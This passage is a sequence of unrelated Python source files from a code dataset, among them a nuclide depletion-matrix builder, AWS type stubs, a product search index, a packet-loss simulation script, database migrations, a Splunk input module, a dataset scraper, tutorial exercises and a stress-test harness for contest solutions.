float(reaction_node.get('energy'))\n\n self.nuclides.append(nuc)\n nuclide_index += 1\n\n # Read neutron induced fission yields table\n nfy_node = root.find('neutron_fission_yields')\n\n self.yields = nuclide.Yield()\n\n # 
code.interact(local=locals())\n\n        # Create and load all the variables\n        self.yields.n_fis_prod = int(nfy_node.find('nuclides').text)\n        self.yields.n_precursors = int(nfy_node.find('precursor').text)\n        self.yields.n_energies = int(nfy_node.find('energy_points').text)\n\n        temp = nfy_node.find('precursor_name').text\n        self.yields.precursor_list = [x for x in temp.split()]\n\n        temp = nfy_node.find('energy').text\n        self.yields.energy_list = [float(x) for x in temp.split()]\n\n        self.yields.energy_dict = OrderedDict()\n        self.precursor_dict = OrderedDict()\n\n        # Form dictionaries out of inverses of lists\n        energy_index = 0\n\n        for x in self.yields.energy_list:\n            self.yields.energy_dict[x] = energy_index\n            energy_index += 1\n\n        precursor_index = 0\n\n        for x in self.yields.precursor_list:\n            self.precursor_dict[x] = precursor_index\n            precursor_index += 1\n\n        # Allocate variables\n        self.yields.name = []\n\n        self.yields.fis_yield_data = np.zeros([self.yields.n_fis_prod,\n                                               self.yields.n_energies,\n                                               self.yields.n_precursors])\n\n        self.yields.fis_prod_dict = OrderedDict()\n\n        product_index = 0\n\n        # For each fission product\n        for yield_table_node in nfy_node.findall('nuclide_table'):\n            name = yield_table_node.get('name')\n            self.yields.name.append(name)\n\n            nuc_ind = self.nuclide_dict[name]\n\n            self.nuclides[nuc_ind].yield_ind = product_index\n\n            # For each energy (table)\n            for fy_table in yield_table_node.findall('fission_yields'):\n                energy = float(fy_table.get('energy'))\n\n                energy_index = self.yields.energy_dict[energy]\n\n                self.yields.fis_prod_dict[name] = product_index\n                temp = fy_table.find('fy_data').text\n                self.yields.fis_yield_data[product_index, energy_index, :] = \\\n                    [float(x) for x in temp.split()]\n\n            product_index += 1\n\n    def form_matrix(self, rates, cell_id):\n        \"\"\" Forms depletion matrix.\n\n        Parameters\n        ----------\n        rates : reaction_rates.ReactionRates\n            Reaction rates to form matrix from.\n        cell_id : int\n            Cell coordinate in rates to evaluate for.\n\n        Returns\n        -------\n        matrix : scipy.sparse.csr_matrix\n            Sparse matrix representing depletion.\n        \"\"\"\n\n        import scipy.sparse as sp\n        import math\n\n        np = rates.n_poly\n\n        matrix = sp.dok_matrix((self.n_nuclides * np, self.n_nuclides * np))\n\n        for i in range(self.n_nuclides):\n            nuclide = self.nuclides[i]\n\n            if nuclide.n_decay_paths != 0:\n                # Decay paths\n                # Loss\n                decay_constant = math.log(2)/nuclide.half_life\n\n                for p in range(np):\n\n                    matrix[i*np + p, i*np + p] -= decay_constant\n\n                    # Gain\n                    for j in range(nuclide.n_decay_paths):\n                        target_nuclide = nuclide.decay_target[j]\n\n                        # Allow for total annihilation for debug purposes\n                        if target_nuclide != 'Nothing':\n                            k = self.nuclide_dict[target_nuclide]\n\n                            matrix[k*np + p, i*np + p] += \\\n                                nuclide.branching_ratio[j] * decay_constant\n\n            if nuclide.name in rates.nuc_to_ind:\n                # Extract all reactions for this nuclide in this cell\n                nuc_rates = rates[cell_id, nuclide.name, :, :]\n\n                for j in range(nuclide.n_reaction_paths):\n                    path = nuclide.reaction_type[j]\n                    # Extract reaction index, and then final reaction rate\n                    r_id = rates.react_to_ind[path]\n                    path_rate = nuc_rates[r_id, :]\n\n                    target_nuclide = nuclide.reaction_target[j]\n\n                    for p in range(np):\n                        for pp in range(np):\n                            weight_rate = zernike.form_b_matrix(p, pp, path_rate)\n\n                            # Loss term\n                            matrix[i*np+pp, i*np+p] -= weight_rate\n\n                            # Gain term, kept inside the (p, pp) loop so every\n                            # weighted rate is credited, not only the last one\n                            # Allow for total annihilation for debug purposes\n                            if target_nuclide != 'Nothing':\n                                if path != 'fission':\n                                    k = self.nuclide_dict[target_nuclide]\n                                    matrix[k*np+pp, i*np+p] += weight_rate\n                                else:\n                                    m = self.precursor_dict[nuclide.name]\n                                    for k in range(self.yields.n_fis_prod):\n                                        l = self.nuclide_dict[self.yields.name[k]]\n                                        # Todo energy\n                                        matrix[l*np+pp, i*np+p] += \\\n                                            self.yields.fis_yield_data[k, 0, m] * \\\n                                            weight_rate\n
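\n        # Illustrative layout (hypothetical sizes): with n_nuclides = 3 and\n        # np = 4 polynomial modes the assembled operator is 12x12, and entry\n        # (k*np+pp, i*np+p) couples mode p of nuclide i to mode pp of nuclide k.\n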
\n        matrix = matrix.tocsr()\n        return matrix\n\n    def nuc_by_ind(self, ind):\n        \"\"\" Extracts nuclides from the list by dictionary key.\n\n        Parameters\n        ----------\n        ind : str\n            Name of nuclide.\n\n        Returns\n        -------\n        nuclide.Nuclide\n            Nuclide object that corresponds to ind.\n        \"\"\"\n        return self.nuclides[self.nuclide_dict[ind]]\n\n\ndef matrix_wrapper(input_tuple):\n    \"\"\" Parallel wrapper for matrix formation.\n\n    This wrapper is used whenever a pmap/map-type function is used to make\n    matrices for each cell in parallel.\n\n    Parameters\n    ----------\n    input_tuple : Tuple\n        Index 0 is the chain (depletion_chain.DepletionChain), index 1 is the\n        reaction rate array (reaction_rates.ReactionRates), index 2 is the\n        cell_id.\n\n    Returns\n    -------\n    scipy.sparse.csr_matrix\n        The matrix for this reaction rate.\n    \"\"\"\n    return input_tuple[0].form_matrix(input_tuple[1], input_tuple[2])\n","sub_path":"source/depletion_chain.py","file_name":"depletion_chain.py","file_ext":"py","file_size_in_byte":10908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"209531225","text":"\"\"\"\nType annotations for schemas service client waiters.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_schemas/waiters.html)\n\nUsage::\n\n    ```python\n    import boto3\n\n    from mypy_boto3_schemas import SchemasClient\n    from mypy_boto3_schemas.waiter import (\n        CodeBindingExistsWaiter,\n    )\n\n    client: SchemasClient = boto3.client(\"schemas\")\n\n    code_binding_exists_waiter: CodeBindingExistsWaiter = client.get_waiter(\"code_binding_exists\")\n    ```\n\"\"\"\nfrom botocore.waiter import Waiter as Boto3Waiter\n\nfrom .type_defs import WaiterConfigTypeDef\n\n__all__ = (\"CodeBindingExistsWaiter\",)\n\nclass CodeBindingExistsWaiter(Boto3Waiter):\n    \"\"\"\n    [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/schemas.html#Schemas.Waiter.CodeBindingExists)\n    [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_schemas/waiters.html#codebindingexistswaiter)\n    \"\"\"\n\n    def wait(\n        self,\n        *,\n        Language: str,\n        RegistryName: str,\n        SchemaName: str,\n        SchemaVersion: str = None,\n        WaiterConfig: WaiterConfigTypeDef = None\n    ) -> None:\n        \"\"\"\n        [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/schemas.html#Schemas.Waiter.CodeBindingExists.wait)\n        [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_schemas/waiters.html#codebindingexistswaiter)\n        \"\"\"\n","sub_path":"typings/mypy_boto3/schemas/waiter.pyi","file_name":"waiter.pyi","file_ext":"pyi","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"597789828","text":"# -*- coding:utf8 -*-\n\nimport json\nimport os\n\ndict_mots_index = {}\ndict_produits_mots = {}\n\nif os.path.exists(\"mots_index.dict\"):\n    with open(\"mots_index.dict\", 'r') as fichier:\n        dict_mots_index = json.load(fichier)\n\n    with open(\"produits_mots.dict\", 'r') as fichier:\n        dict_produits_mots = json.load(fichier)\n\nmots_vides = ['le', 'la', 'les', 'de', 'du', 'des', u'à', 'au']\n
\ndef dot(v1, v2):\n    valeur = 0\n\n    for i in range(min(len(v1), len(v2))):\n        valeur += v1[i] * v2[i]\n\n    return valeur\n\n\ndef index_mot(mot, ajoute=True):\n    mot = mot.lower()\n\n    if mot in mots_vides:\n        return -1\n\n    if mot not in dict_mots_index:\n        if ajoute == True:\n            index = len(dict_mots_index)\n            dict_mots_index[mot] = index\n\n            return index\n\n        return -1\n\n    return dict_mots_index[mot]\n\n\ndef sauvegarde_fichiers():\n    with open(\"mots_index.dict\", 'w') as fichier:\n        fichier.write(json.dumps(dict_mots_index))\n\n    with open(\"produits_mots.dict\", 'w') as fichier:\n        fichier.write(json.dumps(dict_produits_mots))\n\n\ndef ajoute_produit(id_produit, nom_produit, nom_boulangerie, nom_ville, nom_pays, sauvegarde=True):\n    indices = []\n\n    # index the product\n    mots = nom_produit.split(' ')\n\n    for mot in mots:\n        indices.append(index_mot(mot))\n\n    mots = nom_boulangerie.split(' ')\n\n    for mot in mots:\n        indices.append(index_mot(mot))\n\n    indices.append(index_mot(nom_ville))\n\n    indices.append(index_mot(nom_pays))\n\n    # compute the product's vector, skipping the -1 returned for stop words\n    vecteur = [0 for i in range(len(dict_mots_index))]\n\n    for index in indices:\n        if index != -1:\n            vecteur[index] = 1\n\n    dict_produits_mots[id_produit] = vecteur\n\n    if sauvegarde:\n        sauvegarde_fichiers()\n\ndef recherche_produit(recherche):\n    vecteur = [0 for i in range(len(dict_mots_index))]\n\n    # compute the query's vector\n    mots = recherche.split(' ')\n    mots = [mot for mot in mots if mot not in mots_vides and len(mot) > 0]\n\n    for mot in mots:\n        index = index_mot(mot, False)\n\n        if index != -1:\n            vecteur[index] = 1\n\n    # compare the query vector against every product vector\n    cles = []\n    nombre = 0\n    nombre_mots = len(mots)\n\n    for cle in dict_produits_mots:\n        valeur = dot(dict_produits_mots[cle], vecteur)\n\n        if valeur == nombre_mots:\n            cles.append(cle)\n            nombre += 1\n\n            if nombre == 10:\n                break\n\n    return cles\n","sub_path":"jvdbp/recherche.py","file_name":"recherche.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"552061882","text":"from random import *\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ['CUDA_VISIBLE_DEVICES'] = '2'\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = '3'\nimport PIL\nimport tensorflow as tf\nimport numpy as np\nfrom keras import layers\nfrom keras.models import load_model\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.applications import VGG16\nfrom keras.optimizers import SGD\nfrom keras import Sequential\nimport math\nimport sys\nimport gc\nfrom tqdm import tqdm\n\ntf.random.set_seed(960312)\n\nnumber_of_packet_to_drop = int(sys.argv[1])\ndrop_num = number_of_packet_to_drop\nprint(drop_num,\"/64 packet lost\")\npath = \"/media/2/Network/extracted_feature/whole_shuffle_to_19_no-rescale/\"\nsave_path = path+\"with_\"+str(drop_num)+\"_packet_error/\"\nif os.path.isdir(save_path) is False:\n    os.mkdir(save_path)\n\ndef packet_drop(arr):\n    global number_of_packet_to_drop\n    #print(arr.shape)\n    index = randrange(65-number_of_packet_to_drop)\n    arr[:,:,index*8:(index*8+8*number_of_packet_to_drop)] = 0\ndef error_injection(data):\n    for img in tqdm(data):\n        #print(img.shape)\n        packet_drop(img)\n\nfile_list = os.listdir(path)\ntrain_features = []\ntrain_label = []\ntesting_features = []\ntesting_label = []\nval_features = []\nval_label = []\nfor item in file_list:\n    #print(item)\n    if \"train_feature\" in item:\n        #print(item)\n        train_features.append(item)\n    elif \"train_label\" in item:\n        
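# (assumption) shard files are named like train_feature_XX.npy,\n        # train_label_XX.npy, test_feature_XX.npy and so on, one array each\n        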
train_label.append(item)\n elif \"test_label\" in item:\n testing_label.append(item)\n elif \"test_feature\" in item:\n testing_features.append(item)\n elif \"val_feature\" in item:\n val_features.append(item)\n elif \"val_label\" in item:\n val_label.append(item)\ndef concatenate(items,save_name):\n global path \n for index,item in enumerate(items):\n print(index,item)\n if index == 0:\n a = np.load(path+item)#,mmap_mode=\"r\")\n if \"feature\" in save_name :\n error_injection(a)\n print(\"===\",a.shape)\n else :\n tmp = np.load(path+item)#,mmap_mode=\"r\")\n if \"feature\" in save_name :\n error_injection(tmp)\n print(\"===\",tmp.shape)\n a = np.concatenate((a,tmp),axis=0)\n print(a.shape)\n np.save(save_path+save_name,a)\n print(save_name+\".npy saved, shape :\",a.shape)\n del a\n gc.collect()\n\n\nconcatenate(train_label,\"train_label_\"+str(drop_num)) \nconcatenate(train_features,\"train_feature_\"+str(drop_num))\n\nconcatenate(testing_features,\"test_feature_\"+str(drop_num))\nconcatenate(testing_label,\"test_label_\"+str(drop_num))\n\nconcatenate(val_features,\"val_feature_\"+str(drop_num))\nconcatenate(val_label,\"val_label_\"+str(drop_num))\n\nimport os\nos._exit(00)\n","sub_path":"retrain_and_evaluate/1~10/packet_drop_for_no-scale.py","file_name":"packet_drop_for_no-scale.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"211478287","text":"\"\"\"posts table\n\nRevision ID: 2c13ec59dcc8\nRevises: d225d84498ef\nCreate Date: 2020-02-07 19:35:34.509539\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2c13ec59dcc8'\ndown_revision = 'd225d84498ef'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('post', sa.Column('timestamp', sa.DateTime(), nullable=True))\n op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_post_timestamp'), table_name='post')\n op.drop_column('post', 'timestamp')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2c13ec59dcc8_posts_table.py","file_name":"2c13ec59dcc8_posts_table.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"63556530","text":"\n# encoding = utf-8\n\nimport os\nimport sys\nimport time\nimport datetime\nimport requests\nimport json\n\n\n\ndef validate_input(helper, definition):\n pass\n\ndef collect_events(helper, ew):\n\n '''\n Verify SSL Certificate\n '''\n \n ssl_certificate = helper.get_arg('ssl_certificate_verification')\n \n if ssl_certificate == True:\n verify_ssl = True\n else:\n verify_ssl = False\n\n '''\n Force HTTPS\n '''\n \n dynatrace_tenant_input = helper.get_arg('dynatrace_tenant')\n \n if dynatrace_tenant_input.find('https://') == 0:\n opt_dynatrace_tenant = dynatrace_tenant_input\n elif dynatrace_tenant_input.find('http://') == 0:\n opt_dynatrace_tenant = dynatrace_tenant_input.replace('http://', 'https://')\n else: \n opt_dynatrace_tenant = 'https://' + dynatrace_tenant_input\n \n '''\n '''\n \n opt_dynatrace_api_token = helper.get_arg('dynatrace_api_token')\n opt_dynatrace_collection_interval = helper.get_arg('dynatrace_collection_interval')\n opt_dynatrace_entity_endpoints = helper.get_arg('entity_endpoints')\n \n time_offset = int(opt_dynatrace_collection_interval) * 1000\n current_time = int(round(time.time() * 1000))\n offset_time = current_time - time_offset\n\n\n headers = {'Authorization': 'Api-Token {}'.format(opt_dynatrace_api_token),\n 'version':'Splunk TA 1.0.3'}\n api_url = opt_dynatrace_tenant + '/api/v1/entity/'\n parameters = { 'startTimestamp':str(offset_time), \n 'endTimestamp': str(current_time)\n }\n\n for endpoint in opt_dynatrace_entity_endpoints:\n response = helper.send_http_request(api_url + endpoint , \"GET\", headers=headers, parameters=parameters, payload=None, cookies=None, verify=verify_ssl, cert=None, timeout=None, use_proxy=True)\n try:\n response.raise_for_status()\n except:\n helper.log_error (response.text)\n return\n \n data = response.json()\n z = json.dumps(data)\n x = json.loads(z)\n\n for entity in x:\n eventLastSeenTime = entity[\"lastSeenTimestamp\"]/1000\n entity.update({\"timestamp\":eventLastSeenTime})\n entity['endpoint'] = endpoint\n serialized = json.dumps(entity, sort_keys=True)\n event = helper.new_event(data=serialized, time=eventLastSeenTime, host=None, index=None, source=None, sourcetype=None, done=True, unbroken=True)\n ew.write_event(event)\n\n # Save the name of the Dynatrace Server that this data came from\n event = helper.new_event(data='{\"dynatrace_server\":\"' + opt_dynatrace_tenant + '\"}', host=None, index=None, source=None, sourcetype=None, done=True, unbroken=True)\n ew.write_event(event)\n \n \n ","sub_path":"bin/input_module_dynatrace_entity.py","file_name":"input_module_dynatrace_entity.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"268033904","text":"#!/usr/bin/env python\n\n\n'''\nAdapted from https://github.com/matthewgadd/RobotCarDataset-Scraper\n'''\n\n'''\nGets a list of available datasets from the Oxford Robotcar Dataset website.\n\nMatt Gadd\nMar 2019\nOxford Robotics Institute, Oxford University.\n\n'''\n\nimport requests\nimport re\n\nfrom scrape_mrgdatashare import datasets_url\nimport argparse\nfrom pathlib import 
Path\n\n\navailable_sensor_types = [\n    'tags',\n    'stereo_centre',\n    'stereo_left',\n    'stereo_right',\n    'vo',\n    'mono_left',\n    'mono_right',\n    'mono_rear',\n    'lms_front',\n    'lms_rear',\n    'ldmrs',\n    'gps'\n]\n\ndef absolute_sensor_type(sensor_type):\n    # if sensor_type is like stereo_centre_01\n    if sensor_type[-2:].isdigit():\n        return sensor_type[:-3] # stereo_centre\n\n    return sensor_type\n\ndef main(asked_sensors, selected_sequences):\n    # open session\n    session_requests = requests.session()\n\n    # get http response from website\n    result = session_requests.get(datasets_url)\n    text = result.text\n\n    # parse response text\n    text_locations = [text_location.end()\n                      for text_location in re.finditer(datasets_url, text)]\n    datasets = [str(text[text_location:text_location + 19])\n                for text_location in text_locations]\n\n    # ignore metadata and sort unique datasets\n    datasets = datasets[2:]\n    datasets = sorted(list(set(datasets)))\n\n    # write output text file\n    datasets_file = \"datasets.csv\"\n    with open(datasets_file, \"w\") as file_handle:\n        # iterate datasets; a selection of None means keep every sequence\n        filtered_datasets = (dataset for dataset in datasets\n                             if selected_sequences is None or dataset in selected_sequences)\n        for dataset in filtered_datasets:\n\n            # url to dataset page\n            dataset_url = datasets_url + dataset\n            result = session_requests.get(dataset_url)\n            text = result.text\n\n            # parse text for sensor type\n            start = [\n                text_location.end() for text_location in re.finditer(\n                    \"download/\\?filename=datasets\", text)]\n            sensor_types = []\n            for s in start:\n                ss = s\n                while text[ss + 40:ss + 44] != \".tar\":\n                    ss += 1\n                sensor_type = text[s + 41:ss + 40]\n                if absolute_sensor_type(sensor_type) in asked_sensors:\n                    sensor_types.append(str(sensor_type))\n\n            # write dataset entry\n            file_handle.write(dataset + \",\" + \",\".join(sensor_types) + \"\\n\")\n\n\n\nif __name__ == \"__main__\":\n    # option parsing suite\n    argument_parser = argparse.ArgumentParser(\n        description=\"get_datasets input parameters\")\n\n    # specify CL args\n    argument_parser.add_argument(\n        \"--sensors\",\n        dest=\"asked_sensors\",\n        help=\"list of sensor types you want to download, separated by a ',' (default: all sensor types).\\n\"\n        + \"e.g: --sensors 'tags,stereo_centre'\\n\"\n        + f\"list of available sensor types: {available_sensor_types}\",\n        default=\",\".join(available_sensor_types)\n    )\n\n    argument_parser.add_argument(\n        \"--sequences\",\n        dest=\"selected_sequences\",\n        help=\"file with the list of sequences you want to download, one sequence per line (default: all sequences).\",\n        default=None\n    )\n\n\n    # parse CL\n    parse_args = argument_parser.parse_args()\n\n    # the default is already a comma-separated string, so both cases parse the same way\n    asked_sensors = parse_args.asked_sensors\n    asked_sensors = asked_sensors.replace(\" \", \"\")\n    asked_sensors = set(asked_sensors.split(','))\n    assert asked_sensors.issubset(set(available_sensor_types)), asked_sensors - set(available_sensor_types)\n\n    selected_sequences_file = parse_args.selected_sequences\n    if selected_sequences_file is None:\n        # no sequence file given: download every sequence\n        selected_sequences = None\n    else:\n        selected_sequences = Path(selected_sequences_file).expanduser().read_text().splitlines()\n\n    main(asked_sensors, selected_sequences)\n","sub_path":"get_datasets.py","file_name":"get_datasets.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"45024547","text":"def greet_users(names):\n    \"\"\"Print a simple greeting to each user in the list.\"\"\"\n    for name in names:\n        msg = \"Hello, \" + name.title() + \"!\"\n        print(msg)\n\n\nusernames = [\"hannah\", \"ty\", \"margot\"]\ngreet_users(usernames)\n\n\n# Start with 
some designs that need to be printed.\nunprinted_designs = [\"iphone case\", \"robot pendant\", \"dodecahedron\"]\ncompleted_models = []\n\n# Simulate printing each design, until none are left.\n# Move each design to completed_models after printing.\nwhile unprinted_designs:\n current_design = unprinted_designs.pop()\n # Simulate creating a 3D print from the design.\n print(\"Printing model: \" + current_design)\n completed_models.append(current_design)\n\n# Display all completed models.\nprint(\"\\nThe following models have been printed:\")\nfor completed_model in completed_models:\n print(completed_model)\n\n\ndef print_models(unprinted_designs, completed_models):\n \"\"\"\n Simulate printing each design, until none are left.\n Move each design to completed_models after printing.\n \"\"\"\n while unprinted_designs:\n current_design = unprinted_designs.pop()\n\n # Simulate creating a 3D print from the design.\n print(\"Printing model: \" + current_design)\n completed_models.append(current_design)\n\n\ndef show_completed_models(completed_models):\n \"\"\"Show all the models that were printed.\"\"\"\n print(\"\\nThe following models have been printed:\")\n for completed_model in completed_models:\n print(completed_model)\n\n\nunprinted_designs = [\"iphone case\", \"robot pendant\", \"dodecahedron\"]\ncompleted_models = []\nprint_models(unprinted_designs, completed_models)\nshow_completed_models(completed_models)\n\n\ndef make_pizza(*toppings):\n \"\"\"Print the list of toppings that have been requested.\"\"\"\n print(toppings)\n\n\nmake_pizza(\"pepperoni\")\nmake_pizza(\"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\ndef make_pizza(*toppings):\n \"\"\"Summarize the pizza we are about to make.\"\"\"\n print(\"\\nMaking a pizza with the following toppings:\")\n for topping in toppings:\n print(\"- \" + topping)\n\n\nmake_pizza(\"pepperoni\")\nmake_pizza(\"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\ndef make_pizza(size, *toppings):\n \"\"\"Summarize the pizza we are about to make.\"\"\"\n print(\"\\nMaking a \" + str(size) + \"-inch pizza with the following toppings:\")\n for topping in toppings:\n print(\"- \" + topping)\n\n\nmake_pizza(16, \"pepperoni\")\nmake_pizza(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\ndef build_profile(first, last, **user_info):\n \"\"\"Build a dictionary containing everything we know about a user.\"\"\"\n profile = {}\n profile[\"first_name\"] = first\n profile[\"last_name\"] = last\n for key, value in user_info.items():\n profile[key] = value\n return profile\n\n\nuser_profile = build_profile(\n \"albert\", \"einstein\", location=\"princeton\", field=\"physics\"\n)\nprint(user_profile)\n\n\nimport scratch_8_modules as pizza\n\npizza.make_pizza(16, \"pepperoni\")\npizza.make_pizza(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\nfrom scratch_8_modules import make_pizza\n\nmake_pizza(16, \"pepperoni\")\nmake_pizza(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\nfrom scratch_8_modules import make_pizza as mp\n\nmp(16, \"pepperoni\")\nmp(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\nimport scratch_8_modules as p\n\np.make_pizza(16, \"pepperoni\")\np.make_pizza(12, \"mushrooms\", \"green peppers\", \"extra cheese\")\n\n\nfrom scratch_8_modules import *\n\nmake_pizza(16, \"pepperoni\")\nmake_pizza(12, \"mushrooms\", \"green peppers\", \"extra 
cheese\")\n","sub_path":"chapter8/scratch_8.py","file_name":"scratch_8.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"53552960","text":"\"\"\"Add comments table\n\nRevision ID: 83dce15c3d36\nRevises: 75844bac4c9d\nCreate Date: 2019-06-10 15:23:11.647466\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '83dce15c3d36'\ndown_revision = '75844bac4c9d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(), nullable=True),\n sa.Column('comment', sa.String(), nullable=True),\n sa.Column('postedAt', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('comments')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/83dce15c3d36_add_comments_table.py","file_name":"83dce15c3d36_add_comments_table.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"22396694","text":"# -*- coding: utf-8 -*-\r\n#!/usr/bin/env python\r\n# Copyright 2018 ZhangT. All Rights Reserved.\r\n# Author: ZhangT\r\n# Author-Github: github.com/zhangt2333\r\n# ACM对拍器.py 2018/8/21 00:04\r\n\r\nfrom random import *\r\nimport os\r\nimport re\r\nimport sys\r\n\r\n\r\ndef prepare(dir, isAnsCpp):\r\n \"\"\"对代码文件加上freopen\"\"\"\r\n file = dir + ('ans.cpp' if isAnsCpp else \"my.cpp\")\r\n RE = re.compile('int main\\(\\)\\s{0,}\\{')\r\n add = 'int main()\\n{\\n\\tfreopen(\"in.txt\",\"r\",stdin);\\n\\t'\r\n add = add + ('freopen(\"ans.txt\",\"w\",stdout);' if isAnsCpp else 'freopen(\"my.txt\",\"w\",stdout);')\r\n with open(file, \"r+\", encoding='utf-8') as f:\r\n try:\r\n string = f.read()\r\n except Exception:\r\n f.close()\r\n raise Exception('cppFile must under utf-8 encoding')\r\n if 'main' not in string:\r\n f.close()\r\n raise Exception('\"int main()\" not found in file')\r\n if 'freopen' in string:\r\n f.close()\r\n return\r\n string = RE.split(string)\r\n string = string[0] + add + string[1]\r\n f.write(string)\r\n f.close()\r\n\r\n\r\ndef compile(dir_gpp, dir):\r\n \"\"\"用g++编译器编译cpp\"\"\"\r\n os.system('call \"{}\" \"{}ans.cpp\" -o \"{}ans\"'.format(dir_gpp, dir, dir))\r\n os.system('call \"{}\" \"{}my.cpp\" -o \"{}my\"'.format(dir_gpp, dir, dir))\r\n\r\n\r\ndef run(dir):\r\n \"\"\"运行编译后的文件\"\"\"\r\n os.system('cd \"{}\"&\"{}ans\"'.format(dir, dir))\r\n os.system('cd \"{}\"&\"{}my\"'.format(dir, dir))\r\n\r\n\r\ndef cmp(dir):\r\n \"\"\"对文件结果进行比较\"\"\"\r\n res = os.popen('fc \"{}ans.txt\" \"{}my.txt\"'.format(dir, dir))\r\n return res.read()\r\n\r\n\r\ndef show(dir):\r\n \"\"\"弹出对拍错误结果\"\"\"\r\n with open(dir + 'my.txt', \"r\", encoding='UTF-8') as f1, \\\r\n open(dir + 'ans.txt', \"r\", encoding='UTF-8') as f2,\\\r\n open(dir + 'in.txt', \"a\", encoding='UTF-8') as f3:\r\n string = '你的输出:\\n' + f1.read() + '标程输出:\\n' + f2.read()\r\n f3.write(string)\r\n f1.close()\r\n f2.close()\r\n f3.close()\r\n os.popen(dir + 'in.txt')\r\n\r\n\r\ndef work(path_gpp, dir, times):\r\n \"\"\"对拍器工作函数\"\"\"\r\n path_gpp = os.path.abspath(path_gpp)\r\n dir = os.path.abspath(dir) + '\\\\'\r\n print(\"正在预处理源代码...\")\r\n try:\r\n prepare(dir, True)\r\n 
prepare(dir, False)\r\n    except Exception as e:\r\n        print('Failed to add freopen statements to the files ({})'.format(str(e)))\r\n        sys.exit(-1)\r\n    print(\"Compiling files...\")\r\n    compile(path_gpp, dir)\r\n    cnt = 0\r\n    while (cnt <= times):\r\n        cnt += 1\r\n        print('Running stress test #{}'.format(cnt))\r\n        generate_data(dir)\r\n        run(dir)\r\n        res = cmp(dir)\r\n        if '找不到差异' not in res:  # fc reports \"no differences encountered\" in Chinese on a Chinese-locale Windows\r\n            show(dir)\r\n            break\r\n\r\n# ------------------------------------- helper functions end here (kept in one file for convenience) ----------------------------------------------\r\n\r\n\r\n# override the random test-data generator here\r\ndef generate_data(dir):\r\n    \"\"\"Random test-data generator.\"\"\"\r\n    file = dir + 'in.txt'\r\n    data = ''\r\n    # ----------------------------------- write the random data generation here ---------------------------\r\n\r\n    k = randint(22, 32)\r\n    A = randint(0, (1 << k) - 1)\r\n    B = randint(0, (1 << k) - 1)\r\n    C = randint(0, (1 << k) - 1)\r\n    data = data + \"{} {} {} {}\".format(A, B, C, k) + '\\n'\r\n\r\n    # ----------------------------------- write the random data generation here --------------------------\r\n    with open(file, \"w\", encoding='utf-8') as f:\r\n        f.write(data)\r\n        f.close()\r\n\r\n\r\n# stress-tester configuration\r\npath_gpp = 'C:/Program Files/CodeBlocks/MinGW/bin/g++.exe' # compiler path\r\ndir = 'C:/Users/TTTT/Desktop/2018ACM暑期集训/对拍进行时' # directory containing the two cpp sources (ans.cpp, my.cpp)\r\ntimes = 1000\r\n\r\nif __name__ == '__main__':\r\n    work(path_gpp, dir, times)\r\n","sub_path":"ACM对拍器(for windows).py","file_name":"ACM对拍器(for windows).py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"537468814","text":"import numpy as np\nfrom opencmiss.iron import iron\nimport fields\n\ndef interpolate_field(field, element_ids=[], num_values=4,dimension=3, derivative_number=1, xi=None, elems=None):\n\n    if xi is None:\n        XiNd = fields.generate_xi_grid_fem(num_points=num_values)\n\n        num_elem_values = XiNd.shape[0]\n        num_Xe = len(element_ids)\n     